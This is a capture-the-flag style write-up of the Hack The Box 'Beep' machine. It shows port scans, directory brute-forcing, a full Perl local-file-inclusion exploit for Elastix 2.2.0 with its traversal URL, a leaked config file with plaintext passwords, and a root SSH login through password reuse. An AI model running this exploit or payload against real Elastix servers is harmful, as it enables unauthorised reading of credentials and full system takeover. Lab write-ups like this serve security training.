HTB Beep

$nmap -p- -T4 -A 10.10.10.7

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 18:18 CEST
Stats: 0:03:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 85.29% done; ETC: 18:22 (0:00:02 remaining)
Nmap scan report for 10.10.10.7
Host is up (0.042s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE TOP STLS USER EXPIRE(NEVER) PIPELINING RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) APOP UIDL
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: MAILBOX-REFERRALS THREAD=ORDEREDSUBJECT OK CONDSTORE URLAUTHA0001 CHILDREN MULTIAPPEND LIST-SUBSCRIBED NO X-NETSCAPE IMAP4 UIDPLUS IDLE UNSELECT LISTEXT RIGHTS=kxte ANNOTATEMORE CATENATE STARTTLS LITERAL+ SORT=MODSEQ NAMESPACE Completed THREAD=REFERENCES SORT IMAP4rev1 BINARY RENAME ACL ATOMIC QUOTA ID
443/tcp   open  ssl/https?
|_ssl-date: 2020-08-02T16:22:29+00:00; -1s from scanner time.
879/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 374.33 second

Results:

22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/https?
879/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)

$gobuster dir -u 10.10.10.7:443 -w /usr/share/wordlists/dirb/big.txt -e -o beep.out -k

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.7:443
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/08/02 18:55:32 Starting gobuster
===============================================================
https://10.10.10.7:443/.htaccess (Status: 403)
https://10.10.10.7:443/.htpasswd (Status: 403)
https://10.10.10.7:443/admin (Status: 301)
https://10.10.10.7:443/cgi-bin/ (Status: 403)
https://10.10.10.7:443/configs (Status: 301)
https://10.10.10.7:443/favicon.ico (Status: 200)
https://10.10.10.7:443/help (Status: 301)
https://10.10.10.7:443/images (Status: 301)
https://10.10.10.7:443/lang (Status: 301)
https://10.10.10.7:443/libs (Status: 301)
https://10.10.10.7:443/mail (Status: 301)
https://10.10.10.7:443/modules (Status: 301)
https://10.10.10.7:443/panel (Status: 301)
https://10.10.10.7:443/recordings (Status: 301)
https://10.10.10.7:443/robots.txt (Status: 200)
https://10.10.10.7:443/static (Status: 301)
https://10.10.10.7:443/themes (Status: 301)
https://10.10.10.7:443/var (Status: 301)
https://10.10.10.7:443/vtigercrm (Status: 301)
===============================================================
2020/08/02 19:01:26 Finished
===============================================================

Access to https://10.10.10.7/

So, this box contains an Elastix instance.

According to Wikipedia description:

Elastix is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialing.

The Elastix 2.5 functionality is based on open source projects including Asterisk, FreePBX, HylaFAX, Openfire and Postfix. Those packages offer the PBX, fax, instant messaging and email functions, respectively.

https://en.wikipedia.org/wiki/Elastix

$searchsploit elastix

------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting                                                                                    | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                                                  | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                                            | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                                         | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                                                        | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                                                       | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                                                   | php/webapps/18650.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Let’s try to obtain some extra information trying to exploit: graph.php Local File Inclusion.

$searchsploit -x 37637

Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
      URL: https://www.exploit-db.com/exploits/37637
     Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl
File Type: ASCII text, with CRLF line terminators

Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

Elastix 2.2.0 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl -w

#------------------------------------------------------------------------------------# 
#Elastix is an Open Source Sofware to establish Unified Communications. 
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------#
############################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;) 
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki   \n";
print "\t 0day Elastix 2.2.0  \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);
$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";

$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~ 'This file is part of FreePBX') {
 
print "\n read amportal.conf file : $answer \n\n";
print " successful read\n";
 
}
else { 
print "\n[-] not successful\n";

Access to: https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Save this info in a new file to analyze it.

ePBX is free software: you can redistribute it and/or modify 
# it under the terms of the GNU General Public License as published by 
# the Free Software Foundation, either version 2 of the License, or 
# (at your option) any later version. 
# 
# FreePBX is distributed in the hope that it will be useful, 
# but WITHOUT ANY WARRANTY; without even the implied warranty of 
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 
# GNU General Public License for more details. 
# 
# You should have received a copy of the GNU General Public License 
# along with FreePBX. If not, see . 
# 
# This file contains settings for components of the Asterisk Management Portal 
# Spaces are not allowed! 
# Run /usr/src/AMP/apply_conf.sh after making changes to this file 
# FreePBX Database configuration 
# AMPDBHOST: Hostname where the FreePBX database resides 
# AMPDBENGINE: Engine hosting the FreePBX database (e.g. mysql) 
# AMPDBNAME: Name of the FreePBX database (e.g. asterisk) 
# AMPDBUSER: Username used to connect to the FreePBX database 
# AMPDBPASS: Password for AMPDBUSER (above) 
# AMPENGINE: Telephony backend engine (e.g. asterisk) 
# AMPMGRUSER: Username to access the Asterisk Manager Interface 
# AMPMGRPASS: Password for AMPMGRUSER 
# AMPDBHOST=localhost AMPDBENGINE=mysql 
# AMPDBNAME=asterisk AMPDBUSER=asteriskuser 
# AMPDBPASS=amp109 AMPDBPASS=jEhdIekWmdjE AMPENGINE=asterisk AMPMGRUSER=admin #AMPMGRPASS=amp111 AMPMGRPASS=jEhdIekWmdjE 
# AMPBIN: Location of the FreePBX command line scripts 
# AMPSBIN: Location of (root) command line scripts 
# AMPBIN=/var/lib/asterisk/bin AMPSBIN=/usr/local/sbin 
# AMPWEBROOT: Path to Apache's webroot (leave off trailing slash)

Access to 10.10.10.7 and use admin/jEhdIekWmdjE

$ssh root@10.10.10.7

Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Based on this URL we need to use the diffie-hellman-group-exchange-sha1,
diffie-hellman-group14-sha1 or diffie-hellman-group1-sha1 algorithms.

Although it is considered weak and it is not suggested by default, this server requires one of them.

In this box, we just need to reuse AMPDBPASS password to log in.

$ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7

The authenticity of host '10.10.10.7 (10.10.10.7)' can't be established.
RSA key fingerprint is SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg1pEJ0XXD5nFEjki/hI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.7' (RSA) to the list of known hosts.
root@10.10.10.7's password: 

Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# 

[root@beep ~]# cd /home
[root@beep home]# ls

fanis  spamfilter

[root@beep home]# cd fanis
[root@beep fanis]# cat user.txt

aeffXXXXXXXXXXXXXXXXXXXXXXXXXXXX

[root@beep fanis]# cd /root
[root@beep ~]# cat root.txt

d88eXXXXXXXXXXXXXXXXXXXXXXXXXXXX